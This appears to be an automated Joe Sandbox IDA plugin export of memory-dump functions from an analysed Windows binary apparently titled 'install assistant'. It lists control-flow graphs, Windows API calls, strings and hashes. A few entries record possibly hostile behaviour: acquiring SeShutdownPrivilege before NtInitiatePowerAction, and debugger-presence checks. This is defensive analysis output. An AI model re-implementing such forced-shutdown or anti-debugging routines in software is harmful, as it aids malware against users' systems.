                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                • String ID: 8Q
                                • API String ID: 251514795-4022487301
                                • Opcode ID: 48d5560e506c72cb942cccbc8a91da18a53e4038121e8efaee717f2a854e0426
                                • Instruction ID: 38889e94045f3b42b5209888eba19f80830a927a688b00280d2db8a35bfcbe01
                                • Opcode Fuzzy Hash: 48d5560e506c72cb942cccbc8a91da18a53e4038121e8efaee717f2a854e0426
                                • Instruction Fuzzy Hash: 4A51E7B1A0820AAFDB01DFA4DD40BEEBB79EF0935CF180655D500A7F91D73099C987A5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7654 6ca05b90-6ca05b9c 7655 6ca05bdd 7654->7655 7656 6ca05b9e-6ca05ba9 7654->7656 7659 6ca05bdf-6ca05c57 7655->7659 7657 6ca05bab-6ca05bbd 7656->7657 7658 6ca05bbf-6ca05bcc call 6c8d01f0 call 6ca10b18 7656->7658 7657->7658 7668 6ca05bd1-6ca05bdb 7658->7668 7661 6ca05c83-6ca05c89 7659->7661 7662 6ca05c59-6ca05c81 7659->7662 7662->7661 7664 6ca05c8a-6ca05d49 call 6c8d2250 call 6c8d2340 call 6ca09379 call 6c8ce010 call 6ca07088 7662->7664 7668->7659
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA05D31
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 323602529-1866435925
                                • Opcode ID: da3d2a9667f6710b24ce4241135bbf5e884b647bc97220c6a00ea016a631df73
                                • Instruction ID: 53ca69b36d649831bfcced0a1fff5391abf29ac5bee536a8f2821a80dee38809
                                • Opcode Fuzzy Hash: da3d2a9667f6710b24ce4241135bbf5e884b647bc97220c6a00ea016a631df73
                                • Instruction Fuzzy Hash: 015134B5600B008FD725CF29D595BA7BBF1BB48318F048A2DD8864BB90E775B949CF90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7699 6ca1b925-6ca1b939 call 6ca215a2 7702 6ca1b93b-6ca1b93d 7699->7702 7703 6ca1b93f-6ca1b947 7699->7703 7704 6ca1b98d-6ca1b9ad call 6ca2171f 7702->7704 7705 6ca1b952-6ca1b955 7703->7705 7706 6ca1b949-6ca1b950 7703->7706 7716 6ca1b9bb 7704->7716 7717 6ca1b9af-6ca1b9b9 call 6ca0f9f2 7704->7717 7709 6ca1b973-6ca1b983 call 6ca215a2 CloseHandle 7705->7709 7710 6ca1b957-6ca1b95b 7705->7710 7706->7705 7708 6ca1b95d-6ca1b971 call 6ca215a2 * 2 7706->7708 7708->7702 7708->7709 7709->7702 7719 6ca1b985-6ca1b98b GetLastError 7709->7719 7710->7708 7710->7709 7721 6ca1b9bd-6ca1b9c0 7716->7721 7717->7721 7719->7704
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,6CA2425F), ref: 6CA1B97B
                                • GetLastError.KERNEL32(?,00000000,?,6CA2425F), ref: 6CA1B985
                                • __dosmaperr.LIBCMT ref: 6CA1B9B0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID:
                                • API String ID: 2583163307-0
                                • Opcode ID: 9adec217edb2228940f5b26e07de8b0414da4ee25b898f2127419a4f79ed9ce5
                                • Instruction ID: daeb94fbb013c1dea2073683fb7e68d3639316389f0dc4267f01ffdcf08a7b9c
                                • Opcode Fuzzy Hash: 9adec217edb2228940f5b26e07de8b0414da4ee25b898f2127419a4f79ed9ce5
                                • Instruction Fuzzy Hash: 2A012533A0D1245AC30806BAA945BAE27654B8373CF2D4349E91687FC0DB66C8CF8254

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7944 6ca10b9c-6ca10ba7 7945 6ca10ba9-6ca10bbc call 6ca0f9cc call 6ca10120 7944->7945 7946 6ca10bbe-6ca10bcb 7944->7946 7958 6ca10c10-6ca10c12 7945->7958 7948 6ca10c06-6ca10c0f call 6ca1ae75 7946->7948 7949 6ca10bcd-6ca10be2 call 6ca10cb9 call 6ca1873e call 6ca19c60 call 6ca1b898 7946->7949 7948->7958 7963 6ca10be7-6ca10bec 7949->7963 7964 6ca10bf3-6ca10bf7 7963->7964 7965 6ca10bee-6ca10bf1 7963->7965 7964->7948 7966 6ca10bf9-6ca10c05 call 6ca147bb 7964->7966 7965->7948 7966->7948
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction ID: 9b484f3bd0a17ce370a71742d1c0dd2037d5f6bd30a3e0bc99505ac5d63baffb
                                • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                • Instruction Fuzzy Hash: FCF0443650D6506AC7211A3A8F00BCB32A88F823BCF240705E8A093ED0CB70D4DECBE1
                                APIs
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA05AB4
                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA05AF4
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Ios_base_dtorstd::ios_base::_
                                • String ID:
                                • API String ID: 323602529-0
                                • Opcode ID: 0c39df1439cd081ea2c7d7ca132015288aacbd9058f2d0035e20f41ac51fe11c
                                • Instruction ID: bccfb90a3757ca2a3171bd1c323ac9b7b9a41cbd423799aaa841e21cc4339b13
                                • Opcode Fuzzy Hash: 0c39df1439cd081ea2c7d7ca132015288aacbd9058f2d0035e20f41ac51fe11c
                                • Instruction Fuzzy Hash: 0B513771201B04DBE725CF29D585BD6BBE4BB04718F448A1CD8AA4BB91DB34F589CB81
                                APIs
                                • GetLastError.KERNEL32(6CA36DD8,0000000C), ref: 6CA0EF52
                                • ExitThread.KERNEL32 ref: 6CA0EF59
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorExitLastThread
                                • String ID:
                                • API String ID: 1611280651-0
                                • Opcode ID: b91602b4f5fc74f775794fcc4240f112a66a9beb13127f1c1d6814af8a6e122d
                                • Instruction ID: ec962c09ef82baca7e48f830fbc2bf09a808852ece7f9c34b714c2316cc65b30
                                • Opcode Fuzzy Hash: b91602b4f5fc74f775794fcc4240f112a66a9beb13127f1c1d6814af8a6e122d
                                • Instruction Fuzzy Hash: 2DF02271B04600AFDF049BB0DA08AAE3B74FF41208F144288E005D7B40CF31A989DBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __wsopen_s
                                • String ID:
                                • API String ID: 3347428461-0
                                • Opcode ID: 5d65fe9bf0f889574d222a93228f0c07100136315165b7948d42d5432830c1e8
                                • Instruction ID: 3c07fd00a585358b8d40a44a788fb17c826e674ff435c310a10cc13601a252fb
                                • Opcode Fuzzy Hash: 5d65fe9bf0f889574d222a93228f0c07100136315165b7948d42d5432830c1e8
                                • Instruction Fuzzy Hash: D2116A71A0420EAFCB05CF59E945A9B3BF8EF49314F054059F808AB311D631E915CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction ID: de3b6e006d118a0012b13e8075f4e17b6685f7454ff4ded43d51e35a99fb8b16
                                • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                • Instruction Fuzzy Hash: CE014472C05159BFCF019FA89E009EEBFB5AF08254F144165ED24E2650E73586A8DB91
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000000,?,6CA24115,?,?,00000000,?,6CA24115,00000000,0000000C), ref: 6CA24474
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: bdc6e1b82617fbc0059d9bd4f40082bf3ff8552248951cc0abd530110f799b43
                                • Instruction ID: b4617dacbc1486dc1566e0b59215a07f6160f87f8d5fa81aa586a7240792e018
                                • Opcode Fuzzy Hash: bdc6e1b82617fbc0059d9bd4f40082bf3ff8552248951cc0abd530110f799b43
                                • Instruction Fuzzy Hash: 3FD06C3210020DBBDF128E84DC06EDA3FAAFB88714F018000BA1896020C732E862AB90
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction ID: 9e0432732d9306b7026b362bc560c72199869b6746730a18746459bfc169d4c7
                                • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                • Instruction Fuzzy Hash:
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: g)''
                                • API String ID: 4218353326-3487984327
                                • Opcode ID: fc8a9ef2c2791e5159f26d88f520b958721214bc87db1174a1c9667ca736da62
                                • Instruction ID: 6579c4600557cde86c86ae9eae8193c28c94f94cb2383aeaea8d0adad50bd449
                                • Opcode Fuzzy Hash: fc8a9ef2c2791e5159f26d88f520b958721214bc87db1174a1c9667ca736da62
                                • Instruction Fuzzy Hash: A563DF31745B018FC728CF28D8D0A95B7F2BF95358B1D8A6DC0E64BA55EB74B48ACB40
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 6CA05D6A
                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CA05D76
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CA05D84
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CA05DAB
                                • NtInitiatePowerAction.NTDLL ref: 6CA05DBF
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3256374457-3733053543
                                • Opcode ID: f40a239011a2d12a9632a985e54248354b2cd916425593996f4406245945d445
                                • Instruction ID: ad858b82640fcf0f3c501f45381635f4469cb16ee779d3f88ab00ffbcb3c30f9
                                • Opcode Fuzzy Hash: f40a239011a2d12a9632a985e54248354b2cd916425593996f4406245945d445
                                • Instruction Fuzzy Hash: A5F03070744300BBEA007B24DE0AB5A7BB8EF65705F01455CF945A71D1EBB0A9948B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: \j`7$\j`7$j
                                • API String ID: 0-3644614255
                                • Opcode ID: 5b97f7a1579840c388e30bc743ddc6b1753c0f724605622a5436d9297183f0d0
                                • Instruction ID: 2b216b52aac5a232af1e1ef2e818a15d68a938d63b5863ffbcefb9b17cb64f59
                                • Opcode Fuzzy Hash: 5b97f7a1579840c388e30bc743ddc6b1753c0f724605622a5436d9297183f0d0
                                • Instruction Fuzzy Hash: 9C42347460A3828FCB24CF68C58065ABBE1BBC9354F244E2EE4A5C7B61D774E845CB53
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA66CE5
                                  • Part of subcall function 6CA3CC2A: __EH_prolog.LIBCMT ref: 6CA3CC2F
                                  • Part of subcall function 6CA3E6A6: __EH_prolog.LIBCMT ref: 6CA3E6AB
                                  • Part of subcall function 6CA66A0E: __EH_prolog.LIBCMT ref: 6CA66A13
                                  • Part of subcall function 6CA66837: __EH_prolog.LIBCMT ref: 6CA6683C
                                  • Part of subcall function 6CA6A143: __EH_prolog.LIBCMT ref: 6CA6A148
                                  • Part of subcall function 6CA6A143: ctype.LIBCPMT ref: 6CA6A16C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog$ctype
                                • String ID:
                                • API String ID: 1039218491-3916222277
                                • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                • Instruction ID: 5f421474a41f451a33c560f0cd083ce2ae13312c9af83e700e76d202740a26d4
                                • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                • Instruction Fuzzy Hash: DE03AB308012A8DEDF15CFA5CA54BDCBBB1AF15308F24809AD449A7B91DB346ECDDB61
                                APIs
                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6CA10279
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6CA10283
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CA10290
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 6db8d64b81e4a88736bdd9922e8e21fe67ff2338124ef1b54aafc2653460cbe6
                                • Instruction ID: 8e8916a3201b3144226d7e38e0084de5d7bd80841dce2d2e23c0acc249ee657f
                                • Opcode Fuzzy Hash: 6db8d64b81e4a88736bdd9922e8e21fe67ff2338124ef1b54aafc2653460cbe6
                                • Instruction Fuzzy Hash: 6731B374901229DBCB21DF68DD88BCDBBB4BF08354F5042DAE41DA7650EB709B858F44
                                APIs
                                • GetCurrentProcess.KERNEL32(?,?,6CA0F235,?,?,?,?), ref: 6CA0F19F
                                • TerminateProcess.KERNEL32(00000000,?,6CA0F235,?,?,?,?), ref: 6CA0F1A6
                                • ExitProcess.KERNEL32 ref: 6CA0F1B8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: afc1028e4b432425e4c6f539eff0f3e6a4acd320e0fcc5a61b34464e3c60e83c
                                • Instruction ID: 0f2dac1def69d07d3daca878a12fcc2309a02a5fe7e0d2d714173580d0f126fa
                                • Opcode Fuzzy Hash: afc1028e4b432425e4c6f539eff0f3e6a4acd320e0fcc5a61b34464e3c60e83c
                                • Instruction Fuzzy Hash: C8E08631200208AFCF122F55DD189493F38FF8529AF044418F50CD6521CB36DDC2CB84
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: x=J
                                • API String ID: 3519838083-1497497802
                                • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                • Instruction ID: 995ec41695fafacf8b45a9c970502d618cf0fe71359416913748ac2edfa17b54
                                • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                • Instruction Fuzzy Hash: E091CF31D012299ACF04DFB4DAB09EDB7B2AF06308F24A06AD459F7A50DF3659C9CB50
                                APIs
                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CA078B0
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CA080D3
                                  • Part of subcall function 6CA09379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6CA080BC,00000000,?,?,?,6CA080BC,?,6CA3554C), ref: 6CA093D9
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
